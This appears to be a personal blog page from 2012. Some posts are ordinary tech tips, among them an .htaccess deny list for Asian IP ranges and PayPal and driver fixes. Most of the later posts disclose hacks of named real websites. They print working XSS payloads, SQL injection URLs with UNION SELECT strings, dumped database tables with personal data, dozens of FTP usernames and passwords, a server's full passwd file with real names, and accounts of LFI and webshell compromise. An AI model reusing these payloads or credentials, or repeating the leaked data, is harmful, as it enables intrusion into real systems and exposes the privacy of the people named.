Skip to main content

Posts

Showing posts from 2012

ban Asian ip addresses. Ban chinese spammers with htaccess

After receiving tons of spam on a few websites I've decided to ban the whole apnic addresses

Since I've not found anything to ban the whole APNIC I've searched for the assigned classes that they manage.
How to ban chinese spammers.

P.S. I've added a few LACNIC
(last update 2012-11-16)

Download here the file or just add the content in a .htaccess file and the spam from the Asia should be gone.
Put the .htaccess in the main (or any other) folder of your website.
You can use the same approach to ban any other ipv4 address space.

__________.htaccess____________
#list retrieved from
#http://www.iana.org/assignments/ipv4-address-space/ipv4-address-space.txt

#Banning APNIC
deny from 1.0.0.0/8
deny from 14.0.0.0/8
deny from 27.0.0.0/8
deny from 36.0.0.0/8
deny from 39.0.0.0/8
deny from 42.0.0.0/8
deny from 43.0.0.0/8
deny from 49.0.0.0/8
deny from 58.0.0.0/8
deny from 59.0.0.0/8
deny from 60.0.0.0/8
deny from 61.0.0.0/8
deny from 101.0.0.0/8
deny from 103.0.0.0/8
deny from 106.0…

[Solved] Irfanview "disk is full" error

While using the batch processing of Irfanview you can encounter this error: "disk is full".
The error happens when you've set to overwrite thre previous files (advanced conversion settings) and they are *locked*.
Check if the file can be written by your Windows User, check that the file is not read only, check if the file is not locked by another process.


______________________Remove read only____________________
Right-click on the file.
Click on Properties.
Click on General tab, clear the Read-only check box, and then click OK (confirm also to apply to all the subfolders.
___________________________________

AMD PCNET Family PCI Ethernet Adapter - Windows XP, 2003 Drivers

It could happen that you cannot find the drivers (AMD PCNET Family PCI Ethernet Adapter - not installed) of the ethernet (nic) adapter that is used in  virtualbox.

 PCI\VEN_1022&DEV_2000&SUBSYS_20001022&REV_40\3&267A616A&0&18

I've found also this link https://www.virtualbox.org/ticket/3411 but I was unable to see a working download.


Since the links to the amd websites are failing and it seems that they canno be found website I'm adding a new link.


Here you can download the  Drivers AMD PCNET for Virtualbox

They have been tested with Windows XP 32bit  and Virtualbox 4.2.0 r80737 .
After a bit of time I've tested them with Windows 7 pro 32bit (a slim version) and they work.
They also work on Windows 2003 R2 (thanks to David Acosta).


If you have a direct link to the AMD website or any other good information just add it in the comments.

primomaggio.com | XSS

POST
http://www.primomaggio.com/newsletter.php

POSTDATA
nome=chick&cognome=chick&email=%3Cscript%3Ealert%28document.cookie%29%3B%3C%2Fscript%3Echick%40mailinator.com&x=40&y=7&send=1

_____
An Sql injection was available in the login area of the forum of the previous website (in asp as far as I can remember).

Paypal PDT/IPN - HTTP Error 302

Paypal PDT/IPN - HTTP status Error 302 happens when you are contacting paypal via http while (as far as I can understand) they have enforced the requests to be via SSL (443 https)  and not in simple http requests (80 http).
It happens in sandbox and live.

Paypal PDT error 4003 problem

The Paypal error 4003 (when receiving PDT) could happen the server is doing too many requests/validations for the same "tx" (transaction id) with a cmd=_notify-synch. Paypal will not send back the data after about 5 requests.

Sometimes the error could happen randomly in sandbox. This shouldn't happen in "live".

Paypal merchant_return_link problem

merchant_return_link=click+here
merchant_return_link=return+to+merchant
merchant_return_link=*



it could happen if:
the client browser is clicking the button while not accepting/using/respecting the META tag redirection
the autoreturn is set to off in the the merchant account

an url rewriting could be a solution

antiproibizionisti.it | Sql injections, data leak, system compromise

Since the website has been closed (I'm sorry for that).


Some (old) informations.


***Remember that I've never abused of any website or modified anything or used confidential data.***


http://www.antiproibizionisti.it/ricerca.asp?page=1&trova=(%20Advid%20)';%20trunca

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'

[Microsoft][Driver ODBC Microsoft Access] Errore di sintassi (operatore mancante) nell'espressione della query



/inc_ricerca.htm, line 12



--------------
http://antiproibizionisti.it/archivio_sdf.asp?f=1'0

http://antiproibizionisti.it/display_gessa.asp?f=3629&u='9
http://antiproibizionisti.it/archivio_gessa.asp?f='9

http://antiproibizionisti.it/display.asp?f=4177&u=10

http://antiproibizionisti.it/archivio_sdf.asp?f=10%20union%20select%20sum(nome),1,2,3,6,4,4,5%20from%20user
http://antiproibizionisti.it/archivio_sdf.asp?f=10%20UNION%20SELECT%20id,%20name,%20'','','','','',''…

askyp.com | sql data dump, data leak

Too much data to dump. Anyway I've deleted everything (here ... ).
--- samples ---

company_address (
  company_id bigint(3) NOT NULL auto_increment,
  company_name varchar(200) NOT NULL default '',
  address longtext,
  street_id bigint(3) default NULL,
  city_id bigint(3) default NULL,
  state_id bigint(3) default NULL,
  zip varchar(20) default NULL,
  phone varchar(20) NOT NULL default '0',
  fax varchar(20) default NULL,
  email varchar(100) default NULL,
  category char(1) NOT NULL default '',
  PRIMARY KEY  (company_id)

INSERT INTO company_address VALUES("1", "M & A Hispanic Book Store", "1902 Bergenline Ave", "0", "16284", "30", "07087", "(201) 866-0010", "", "", "0");

------------------------------------------

64.233.183.104 (??? google ???) | sql data dump, data leak

I've found this data time ago...

CREATE TABLE partners (
  id int(11) NOT NULL auto_increment,
  email varchar(255) NOT NULL default '',
  phone varchar(50) default NULL,
  fax varchar(50) default NULL,
  address varchar(255) default NULL,
  zip varchar(20) default NULL,
  city varchar(50) default NULL,
  state varchar(50) default NULL,
  country varchar(50) default NULL,
  first_name varchar(100) default NULL,
  last_name varchar(100) default NULL,
  company_name varchar(100) default NULL,
  login varchar(25) NOT NULL default '',
  password varchar(25) NOT NULL default '',
  additional_data text,
  ku_balance float(16,2) unsigned NOT NULL default '0.00',
  us_balance float(16,2) unsigned NOT NULL default '0.00',
  credit_limit float(10,2) default '0.00',
  status enum('unconfirmed','active','suspended','free') default 'unconfirmed',
  promo varchar(100) default NULL,
  partner_group varchar(40…

nursery-info.net | Sql injection, data leak (sql dumps), system compromise

the website is dead so ... I can publish something

The main table

nurseryinfo (
   Title text,
   Initial text,
   First_Name text,
   Surname text,
   Contact_Name text,
   Position text,
   Nursery text,
   Address text,
   Address1 text,
   Town text,
   County text,
   Postcode text,
   Tel_No text,
   No_0_2 text,
   Range text,
   Weekly text,
   Tot_Staff text,
   Group_No text,
   Facility text,
   Member_No text,
   Branch text,
   Region text,
   Officer_Br text,
   Officer_Re text,
   Officer_Ex text,
   Year_Joined text,
   Eig text,
   Contact text,
   Task_Group text,
   _998 text,
   No_of_Nurs text,
   So text,
   Fax_No text,
   Renewed text,
   Bulletin text,
   E_Mail text,
   Mem_Type text,
   Fees_Paid text,
   Paid text,
   Month_Join text,
   Membership text,
   NDNA text,
   Chair text,
   Regional_R text,
   Chairtel_N text,
   Rep_Tel_No text,
   Ass text,
   Primary_ text,
   Add_site text,
   Head_offic text,
   No_2_3 int(11),
   No_3_5 int(11),
   No_5 in…

meridiana.it | SQL Injection

Since the injection have been fixed time ago ... I just publish some samples (nothing confidential)

Sample error
[TCX][MyODBC]You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near '' ORDER BY N1 ASC, ID_Head DESC' at line 1

/ita/web/index.asp, line 15


db: Sql39909_2
sample table -> clienti
columns -> cliente, indirizzo, data, telefono

sample injection
http://www.meridianaitalia.it/ita/web/index.asp?id_menu=3%20UNION%20Select%20*%20from%20Sql39909_2.clienti/*&menu=Newa

old unisannio.it hosts (2003/2004?)

ns.unisannio.it
mail.unisannio.it
www.unisannio.it
ftp.unisannio.it
nosferatu.unisannio.it
medusa.unisannio.it
hydra.ing.unisannio.it
proxy.unisannio.it
webmail.unisannio.it
gw-0.unisannio.it
wwwsci.unisannio.it
wwwlavoro.unisannio.it
wwwdases.unisannio.it
wwwdsga.unisannio.it
wwwdsba.unisannio.it
wwwstat.unisannio.it
wwwsea.unisannio.it
wwwding.unisannio.it
web.ing.unisannio.it
virgilio.ing.unisannio.it
wheel.ing.unisannio.it
caudina.ing.unisannio.it
serg.ing.unisannio.it
russo.ing.unisannio.it
contabile.ing.unisannio.it
opac.ing.unisannio.it
sgr.ing.unisannio.it
serglink.ing.unisannio.it
ponza.ing.unisannio.it
deal.ing.unisannio.it
gvp.ing.unisannio.it
contabile.ing.unisannio.it
canfora.ing.unisannio.it
paradise.ing.unisannio.it
lisus1.ing.unisannio.it
lisus2.ing.unisannio.it
lisus3.ing.unisannio.it
leus.ing.unisannio.it
leus-ws1.ing.unisannio.it
leus-ws2.ing.unisannio.it
lesim1.ing.unisannio.it
lesim2.ing.unisannio.it
lesim3.ing.unisannio.it
lesim4.ing.unisannio.it
disanto.ing.unis…

old joe accounts of free websites

----ftp.tripod.it----
ftp.tripod.it:21  U: angelo  P: angelo
ftp.tripod.it:21  U: apostolo  P: apostolo
ftp.tripod.it:21  U: arny  P: arny
ftp.tripod.it:21  U: basa  P: basa
ftp.tripod.it:21  U: bedford  P: bedford
ftp.tripod.it:21  U: bonnin  P: bonnin
ftp.tripod.it:21  U: bubak  P: bubak
ftp.tripod.it:21  U: bucky  P: bucky
ftp.tripod.it:21  U: carlton  P: carlton
ftp.tripod.it:21  U: cora  P: cora
ftp.tripod.it:21  U: cozzi  P: cozzi
ftp.tripod.it:21  U: derby  P: derby
ftp.tripod.it:21  U: elin  P: elin
ftp.tripod.it:21  U: emr  P: emr
ftp.tripod.it:21  U: evelina  P: evelina
ftp.tripod.it:21  U: evita  P: evita
ftp.tripod.it:21  U: fania  P: fania
ftp.tripod.it:21  U: fara  P: fara
ftp.tripod.it:21  U: federico  P: federico
ftp.tripod.it:21  U: ferdy  P: ferdy
ftp.tripod.it:21  U: fisher  P: fisher
ftp.tripod.it:21  U: francine  P: francine
ftp.tripod.it:21  U: gareth  P: gareth
ftp.tripod.it:21  U: gonzalez  P: gonzalez
ftp.tripod.it:21  U: gussy  P: gussy
ftp.tripod.it:21  U: h…

Old accounts, dead websites, old passwd

www.dmyouhak.com:21  U/P: ynws
www.dmyouhak.com:21  U/P: daeil24
---------------------------------------




-------shell4.unixshells.de-------
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/adm:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:
news:x:9:13:news:/var/spool/news:
uucp:x:10:14:uucp:/var/spool/uucp:
operator:x:11:0:operator:/root:
games:x:12:100:games:/usr/games:
gopher:x:13:30:gopher:/usr/lib/gopher-data:
ftp:x:14:50:FTP User:/var/ftp:
nobody:x:99:99:Nobody:/:
apache:x:48:48:Apache:/var/www:/bin/false
rpc:x:32:32:Portmapper RPC user:/:/bin/false
mailnull:x:47:47::/var/spool/mqueue:/dev/null
xerox:x:500:500:xerox:/home/xerox:/bin/bash
kwmo37:x:501:100::/home/kwmo37:/bin/bash
sopl69:x:502:100::/home/sopl69:/bin/bash
schnakey:x:514:920:Eberle Frank:/home/schnakey:/bin/bash
pr0t3ct:x:516:920:Jeske Joerg:/hom…

kutuphane.tuik.gov.tr | data leak, system compromise, HTTP splitting, XSS.

-Data leak-

http://kutuphane.tuik.gov.tr/yordambt/liste.php?-skip=0&-atla=0&-sayfa=01&Alan3=&Alan5=&anatur=&bolum=&alttur=&sekil=&ortam=&dil=&yayintarihi=&kgt=&gorsel=&kurumyayini=&cAlanlar=pollo&aa=eseradi&-max=16&universite=&enstitu=&anabilimdali=&bilimdali=&sureliilkharf=&sure=&biryil=&birdergitrh=&birsayi=&biricindekiler=

we can see the full path within the errors
-> C:\Inetpub\wwwroot\yordambt
ex file: _dil.php | index.php | liste.php | _yardim.php | arama.php | anasayfa.php | url.php


After getting access through a lfi it's possible to see that we are on a (windows) box with the default configuration, with the permissions for -everybody- in some important folders. It's possible to operate quite like an administrator with a simple -webshell- script
There are some shared folders without password on other boxes
------

The scripts available from the website are (also…

www.ascension-tech.com | XSS

this xss is locked by the webserver
www.ascension-tech.com/searchresults.asp?searWords=<script>alert(document.cookie);</script>&Go.x=0&Go.y=0

this one is working without problems because there's a javascript that is using the input without sanitizing it. It seems that only the first ' single quote is escaped.... and we add another one.
http://www.ascension-tech.com/searchresults.asp?searWords=%27%27%3Balert%28%271%27%29%3Bvar+asd%3D%27&Go.x=12&Go.y=12


The problem is within "Search Engine Builder 2010"

www.ovosodo.net | Flash XSS - Sql Injections - possible upload of scripts - administrator privileges escalation (system compromise)

(they are not working anymore - check webcaches)
www.ovosodo.net
xss in the requests (simple)

Sql injection (there's no need to write the injection string ... it's very simple)
http://www.ovosodo.net/area_clienti.asp

after *login* it's possible to upload anything that will be available in
http://www.ovosodo.net/images/upload/originali/